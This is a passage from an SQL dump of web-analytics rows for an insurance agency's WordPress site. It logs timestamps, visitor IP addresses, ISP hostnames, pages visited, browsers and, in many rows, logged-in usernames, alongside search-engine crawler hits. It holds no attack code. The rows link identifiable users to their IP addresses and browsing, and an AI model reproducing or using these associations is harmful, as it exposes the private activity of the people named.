6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/register/','',0,'Win7 x64','IE 11','us','1024 x 819','','','','jsimcha','','0','51',0),(2042,'0b_c3fe74eaeb71177a8f0120e7f4f14981','1457454252','69.116.56.224','ool-457438e0.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/register/','',0,'Win7 x64','IE 11','us','1024 x 819','','','','jsimcha','','0','51',0),(2044,'0b_c3fe74eaeb71177a8f0120e7f4f14981','1457454253','69.116.56.224','ool-457438e0.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1024 x 819','','','','jsimcha','','0','0',0),(2047,'0b_d70ea3fcaf83a7b0fd138c5117ac566a','1457454254','69.116.56.224','ool-457438e0.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1440 x 900','','','','jsimcha','','0','51',0),(2050,'0b_c3fe74eaeb71177a8f0120e7f4f14981','1457454270','69.116.56.224','ool-457438e0.dyn.optonline.net','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1024 x 819','','','','jsimcha','','0','51',0),(2051,'0b_c3fe74eaeb71177a8f0120e7f4f14981','1457454278','69.116.56.224','ool-457438e0.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/register/','',0,'Win7 x64','IE 11','us','1024 x 819','','','','jsimcha','','0','51',0),(2053,'0b_c3fe74eaeb71177a8f0120e7f4f14981','1457454352','69.116.56.224','ool-457438e0.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1024 x 819','','','','jsimcha','','0','51',0),(2056,'0b_c3fe74eaeb71177a8f0120e7f4f14981','1457454353','69.116.56.224','ool-457438e0.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1024 x 819','','','','jsimcha','','0','0',0),(2057,'0b_c3fe74eaeb71177a8f0120e7f4f14981','1457454370','69.116.56.224','ool-457438e0.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1024 x 819','','','','jsimcha','','0','51',0),(2059,'0b_c3fe74eaeb71177a8f0120e7f4f14981','1457454479','69.116.56.224','ool-457438e0.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1024 x 819','','','','jsimcha','','0','51',0),(2060,'0b_c3fe74eaeb71177a8f0120e7f4f14981','1457454871','69.116.56.224','ool-457438e0.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1024 x 819','','','','jsimcha','','0','0',0),(2063,'0b_c3fe74eaeb71177a8f0120e7f4f14981','1457454871','69.116.56.224','ool-457438e0.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1024 x 819','','','','jsimcha','','0','0',0),(2066,'0b_25da08f992df66ecc150c701859c05bb','1457455520','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','admin','','0','51',0),(2069,'0b_25da08f992df66ecc150c701859c05bb','1457455521','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','admin','','0','0',0),(2072,'0b_25da08f992df66ecc150c701859c05bb','1457455559','108.58.88.178','ool-6c3a58b2.static.optonline.net','/news/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/wp-admin/edit.php?post_type=page','',0,'Win7','Chrome 48','us','1920 x 1080','','','','admin','','0','0',0),(2074,'0b_25da08f992df66ecc150c701859c05bb','1457455590','108.58.88.178','ool-6c3a58b2.static.optonline.net','/error/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/wp-admin/edit.php?post_type=page','',0,'Win7','Chrome 48','us','1920 x 1080','','','','admin','','0','51',0),(2075,'0b_25da08f992df66ecc150c701859c05bb','1457455599','108.58.88.178','ool-6c3a58b2.static.optonline.net','/test/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/wp-admin/edit.php?post_type=page','',0,'Win7','Chrome 48','us','1920 x 1080','','','','admin','','0','51',0),(2078,'0b_25da08f992df66ecc150c701859c05bb','1457455719','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/wp-admin/customize.php?return=%2Fwp-admin%2Fthemes.php','',0,'Win7','Chrome 48','us','1920 x 1080','','','','admin','','0','51',0),(2080,'0b_25da08f992df66ecc150c701859c05bb','1457455719','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/wp-admin/customize.php?return=%2Fwp-admin%2Fthemes.php','',0,'Win7','Chrome 48','us','1920 x 1080','','','','admin','','0','0',0),(2081,'0b_4606dfe3ed5920f33198086aa3bf4207','1457456025','208.115.111.66','208-115-111-66-reverse.wowrack.com','/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(2084,'0b_acf678e21795c4cce5d949e9eec8c557','1457456986','180.76.15.15','baiduspider-180-76-15-15.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(2087,'0b_c3fe74eaeb71177a8f0120e7f4f14981','1457457956','69.116.56.224','ool-457438e0.dyn.optonline.net','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1440 x 900','','','','jsimcha','','0','0',0),(2089,'0b_c3fe74eaeb71177a8f0120e7f4f14981','1457457995','69.116.56.224','ool-457438e0.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1440 x 900','','','','jsimcha','','0','51',0),(2090,'0b_1af9e6e53958dae1b46fc9e29b72be1b','1457458540','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','0',0),(2093,'0b_1af9e6e53958dae1b46fc9e29b72be1b','1457458543','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','0',0),(2095,'0b_1af9e6e53958dae1b46fc9e29b72be1b','1457458547','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(2096,'0b_1af9e6e53958dae1b46fc9e29b72be1b','1457458553','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(2099,'0b_41ae5939ed9d22378821385fe6518214','1457460136','52.36.57.42','ec2-52-36-57-42.us-west-2.compute.amazonaws.com','/robots.txt','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(2101,'0b_41ae5939ed9d22378821385fe6518214','1457460155','52.36.57.42','ec2-52-36-57-42.us-west-2.compute.amazonaws.com','/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(2104,'0b_41ae5939ed9d22378821385fe6518214','1457460203','52.36.57.42','ec2-52-36-57-42.us-west-2.compute.amazonaws.com','/about-us/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(2105,'0b_41ae5939ed9d22378821385fe6518214','1457460203','52.36.57.42','ec2-52-36-57-42.us-west-2.compute.amazonaws.com','/contact/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(2107,'0b_198d7ac6551280a9df4a0d2945889a77','1457460511','52.34.199.244','ec2-52-34-199-244.us-west-2.compute.amazonaws.com','/robots.txt','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(2108,'0b_198d7ac6551280a9df4a0d2945889a77','1457460581','52.34.199.244','ec2-52-34-199-244.us-west-2.compute.amazonaws.com','/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(2111,'0b_198d7ac6551280a9df4a0d2945889a77','1457460675','52.34.199.244','ec2-52-34-199-244.us-west-2.compute.amazonaws.com','/about-us/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(2114,'0b_198d7ac6551280a9df4a0d2945889a77','1457460676','52.34.199.244','ec2-52-34-199-244.us-west-2.compute.amazonaws.com','/contact/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(2116,'0b_0f47c02b1cb0cd8f437a445487393349','1457460682','85.25.103.119','static-ip-85-25-103-119.inaddr.ip-pool.com','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','http://pizza-tycoon.com/','',0,'Linux','Chrome 37','','','','','','','','2','0',0),(2119,'0b_9d3d0baa43fd105e562de3b3937375d4','1457461015','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(2122,'0b_9d3d0baa43fd105e562de3b3937375d4','1457461027','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','51',0),(2125,'0b_04e0a1e7d79fed08b1b82d84f6f67a8b','1457461051','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1680 x 1050','','','','SimkowitzCo','','0','0',0),(2126,'0b_04e0a1e7d79fed08b1b82d84f6f67a8b','1457461058','75.99.37.250','ool-4b6325fa.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1680 x 1050','','','','SimkowitzCo','','0','51',0),(2128,'0b_04e0a1e7d79fed08b1b82d84f6f67a8b','1457461072','75.99.37.250','ool-4b6325fa.static.optonline.net','/underwriting-search/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1680 x 1050','','','','SimkowitzCo','','0','51',0),(2129,'0b_41483b53c9286881eb95a23c9ab38a9e','1457462097','66.249.83.213,108.41.135.17','pool-108-41-135-17.nycmny.fios.verizon.net','/quotes.htm','Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/6.0 Google Favicon','','',0,'Win7','Firefox 6','us','','','','','','','0','0',0),(2131,'0b_6aa7d8d7110a58435c61f8cda21efab7','1457464623','122.176.94.37','abts-north-static-037.94.176.122.airtelbroadband.in','/','Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36','','',0,'Linux','Chrome 42','in','','','','','','','0','0',0),(2132,'0b_b799161094929e2b0ce820e737aa702b','1457464649','4.79.123.0','4.79.123.0','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)','','',0,'Win7 x64','IE 9','us','','','','','','','0','0',0),(2134,'0b_1af9e6e53958dae1b46fc9e29b72be1b','1457464756','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/forms/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','0',0),(2135,'0b_1af9e6e53958dae1b46fc9e29b72be1b','1457464767','108.58.88.178','ool-6c3a58b2.static.optonline.net','/carrier-field-underwriting-guides/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(2138,'0b_97d721d31af6a4307cd5819e050e5dde','1457464799','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','','','','','roisy','','0','0',0),(2141,'0b_97d721d31af6a4307cd5819e050e5dde','1457464800','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','','','','','roisy','','0','0',0),(2144,'0b_7f986a99562e8431cd1de60fa4a47cc7','1457465042','66.102.6.177','google-proxy-66-102-6-177.google.com','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CFwQFjAA&url=http%3A%2F%2Fwww.empireins.com%2F&ei=0SbfVve-EZ68-QbLDQ&usg=AFQjCNEqpoINuZ9iLoJwjv1SXIp20w_BCg','',0,'Win10','Chrome 48','us','','','','','','','0','0',0),(2147,'0b_df6bc8a9695f445634d7554bd8be097c','1457465046','66.249.88.160','google-proxy-66-249-88-160.google.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 48','us','','','','','','','0','0',0),(2149,'0b_d321426a86ab92a5f42f8f96e750d689','1457465477','69.114.209.224','ool-4572d1e0.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win10','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(2152,'0b_d321426a86ab92a5f42f8f96e750d689','1457465479','69.114.209.224','ool-4572d1e0.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(2153,'0b_d321426a86ab92a5f42f8f96e750d689','1457465487','69.114.209.224','ool-4572d1e0.dyn.optonline.net','/igo/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 48','us','1920 x 1080','','','','','','0','0',0),(2155,'0b_d321426a86ab92a5f42f8f96e750d689','1457465517','69.114.209.224','ool-4572d1e0.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/igo/','',0,'Win10','Chrome 48','us','1920 x 1080','','','','','','0','51',0),(2158,'0b_d321426a86ab92a5f42f8f96e750d689','1457465767','69.114.209.224','ool-4572d1e0.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win10','Chrome 48','us','1920 x 1080','','','','Nkadin','','0','51',0),(2159,'0b_85b4c22f3496c56f74be3bdca4af6e8e','1457465863','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(2161,'0b_85b4c22f3496c56f74be3bdca4af6e8e','1457465865','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(2164,'0b_d321426a86ab92a5f42f8f96e750d689','1457466618','69.114.209.224','ool-4572d1e0.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win10','Chrome 48','us','1920 x 1080','','','','Nkadin','','0','51',0),(2165,'0b_d321426a86ab92a5f42f8f96e750d689','1457466635','69.114.209.224','ool-4572d1e0.dyn.optonline.net','/igo/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win10','Chrome 48','us','1920 x 1080','','','','Nkadin','','0','51',0),(2168,'0b_a5c6e603379bf19c14eeea924240b70d','1457468002','52.37.80.22','ec2-52-37-80-22.us-west-2.compute.amazonaws.com','/meet-the-eib-team/','Mozilla/5.0','','',0,'','','','','','','','','','0','0',0),(2171,'0b_a5c6e603379bf19c14eeea924240b70d','1457468004','52.37.80.22','ec2-52-37-80-22.us-west-2.compute.amazonaws.com','/about-us/','Mozilla/5.0','','',0,'','','','','','','','','','0','0',0),(2173,'0b_1af9e6e53958dae1b46fc9e29b72be1b','1457468346','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/carrier-field-underwriting-guides/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(2174,'0b_1af9e6e53958dae1b46fc9e29b72be1b','1457468359','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(2176,'0b_007be1c7a006dbe215ded71127e73028','1457469300','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','','','','','','','0','0',0),(2177,'0b_1feb960f4c1dd720fa68f746baf27ee8','1457469348','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/term-quotes/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','joelgoldberger','','0','0',0),(2179,'0b_122e340bd722fc2aee3602b84ad8e6f1','1457469502','66.249.83.221,75.99.37.250','ool-4b6325fa.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/6.0 Google Favicon','','',0,'Win7','Firefox 6','','','','','','','','0','0',0),(2180,'0b_61a17d0a9be1f560e344128c2d602f53','1457470165','100.43.91.26','spider-100-43-91-26.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(2183,'0b_995cc5ebc6117697c9ee4581bfa029c6','1457470507','24.184.248.103','ool-18b8f867.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=16&sqi=2&ved=0ahUKEwjCperW_LHLAhUFNiYKHR3MD3sQFghvMA8&url=http%3A%2F%2Fwww.empireins.com%2F&usg=AFQjCNEqpoINuZ9iLoJwjv1SXIp20w_BCg&bvm=bv.116274245,d.eWE','',0,'Win7 x64','IE 11','us','1366 x 768','','','','','','0','0',0),(2186,'0b_995cc5ebc6117697c9ee4581bfa029c6','1457470511','24.184.248.103','ool-18b8f867.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1366 x 768','','','','','','0','0',0),(2188,'0b_995cc5ebc6117697c9ee4581bfa029c6','1457470524','24.184.248.103','ool-18b8f867.dyn.optonline.net','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1366 x 768','','','','','','0','0',0),(2191,'0b_995cc5ebc6117697c9ee4581bfa029c6','1457470539','24.184.248.103','ool-18b8f867.dyn.optonline.net','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/about-us/','',0,'Win7 x64','IE 11','us','1366 x 768','','','','','','0','51',0),(2192,'0b_995cc5ebc6117697c9ee4581bfa029c6','1457470542','24.184.248.103','ool-18b8f867.dyn.optonline.net','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/carriers/','',0,'Win7 x64','IE 11','us','1366 x 768','','','','','','0','51',0),(2194,'0b_995cc5ebc6117697c9ee4581bfa029c6','1457470554','24.184.248.103','ool-18b8f867.dyn.optonline.net','/carriers/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/about-us/','',0,'Win7 x64','IE 11','us','1366 x 768','','','','','','0','51',0),(2195,'0b_995cc5ebc6117697c9ee4581bfa029c6','1457470558','24.184.248.103','ool-18b8f867.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/carriers/','',0,'Win7 x64','IE 11','us','1366 x 768','','','','','','0','51',0),(2197,'0b_995cc5ebc6117697c9ee4581bfa029c6','1457470559','24.184.248.103','ool-18b8f867.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1366 x 768','','','','','','0','0',0),(2200,'0b_5c2aabe719a44e5053b37aa4ad11e92f','1457470650','67.86.239.179','ool-4356efb3.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win8','Chrome 48','us','1024 x 768','Google','','','','','0','0',0),(2203,'0b_5c2aabe719a44e5053b37aa4ad11e92f','1457470656','67.86.239.179','ool-4356efb3.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 48','us','1024 x 768','','','','','','0','0',0),(2204,'0b_5c2aabe719a44e5053b37aa4ad11e92f','1457470667','67.86.239.179','ool-4356efb3.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 48','us','1024 x 768','','','','','','0','0',0),(2206,'0b_923add48cb3087190d56367c9cbc568b','1457470794','157.55.39.227','msnbot-157-55-39-227.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(2207,'0b_1af9e6e53958dae1b46fc9e29b72be1b','1457470839','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','0',0),(2210,'0b_1af9e6e53958dae1b46fc9e29b72be1b','1457470844','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','0',0),(2213,'0b_1af9e6e53958dae1b46fc9e29b72be1b','1457470844','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(2216,'0b_1af9e6e53958dae1b46fc9e29b72be1b','1457470863','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(2219,'0b_1af9e6e53958dae1b46fc9e29b72be1b','1457470874','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 48','us','1920 x 1080','','','','Chaya','','0','51',0),(2221,'0b_a76a615be141789814c330e02135b559','1457471597','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36','','',0,'Win7','Chrome 32','us','1600 x 